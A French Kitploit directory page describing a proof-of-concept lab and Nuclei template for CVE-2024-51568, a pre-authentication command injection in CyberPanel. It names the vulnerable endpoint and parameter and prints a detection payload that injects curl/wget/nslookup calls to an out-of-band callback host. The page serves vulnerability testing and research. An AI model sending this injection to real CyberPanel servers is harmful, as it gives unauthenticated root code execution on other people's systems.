Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template — Environnement de preuve de concept et modèle Nuclei pour tester la CVE-2024-51568, une vulnérabilité d'injection de commande pré-authentification dans CyberPanel, permettant l'exécution de code à distance avec les privilèges root. | Kitploit
Outils/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationLabs et Pratique
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Environnement de preuve de concept et modèle Nuclei pour tester la CVE-2024-51568, une vulnérabilité d'injection de commande pré-authentification dans CyberPanel, permettant l'exécution de code à distance avec les privilèges root.

Voir le dépôt
11il y a 11 moisPas encore vérifié

CVE-2024-51568 - Preuve de concept d'injection de commande CyberPanel

Un environnement de preuve de concept et un modèle Nuclei pour tester CVE-2024-51568, une vulnérabilité critique d'injection de commande sans authentification dans CyberPanel.

Détails de la vulnérabilité

  • CVE : CVE-2024-51568
  • Sévérité : Critique (CVSS 9.8)
  • Type : Injection de commande sans authentification
  • Point d'accès : /filemanager/upload
  • Paramètre : completePath
  • Impact : Exécution de code à distance avec privilèges root

Démarrage rapide

1. Démarrer l'environnement vulnérable

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Vérifier que CyberPanel fonctionne

root@kitploit:~
curl -I http://localhost:8090

3. Tester la vulnérabilité

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Exemple de sortie :

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

Comment ça fonctionne

La vulnérabilité

CyberPanel v2.3.4 contient une faille d'injection de commande dans la fonctionnalité de téléchargement de fichiers :

  1. Point d'accès : POST /filemanager/upload
  2. Paramètre : completePath dans les données de formulaire multipart
  3. Injection : Les commandes sont exécutées via ProcessUtilities.outputExecutioner()
  4. Contournement : Aucune authentification requise en raison d'un contournement du middleware

Modèle Nuclei :

  1. Extrait le jeton CSRF de la requête GET initiale
  2. Envoie un téléchargement de fichier malveillant avec une commande injectée dans completePath
  3. Utilise Interactsh pour la détection hors bande (rappels HTTP/DNS)
  4. Détecte l'exécution réussie lorsque le serveur contacte l'URL Interactsh

Charge utile de détection

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Cette charge utile garantit une détection fiable sur différentes configurations système.

Configuration

Accès CyberPanel

  • URL : http://localhost:8090
  • Admin : admin
  • Mot de passe : 1234567

Références

  • Recherche originale
  • Module Metasploit
  • Détails CVE

Avis de sécurité

Cet environnement contient des vulnérabilités intentionnelles à des fins de recherche en sécurité et d'éducation :

  • NE PAS déployer en production
  • NE PAS exposer à des réseaux publics
  • NE PAS utiliser sur des systèmes qui ne vous appartiennent pas
  • À utiliser uniquement pour des tests de sécurité autorisés

Avertissement

Cette preuve de concept est fournie à des fins éducatives et de tests de sécurité autorisés uniquement. Les utilisateurs sont responsables du respect des lois applicables et de l'obtention des autorisations appropriées avant tout test.

Télécharger l’outil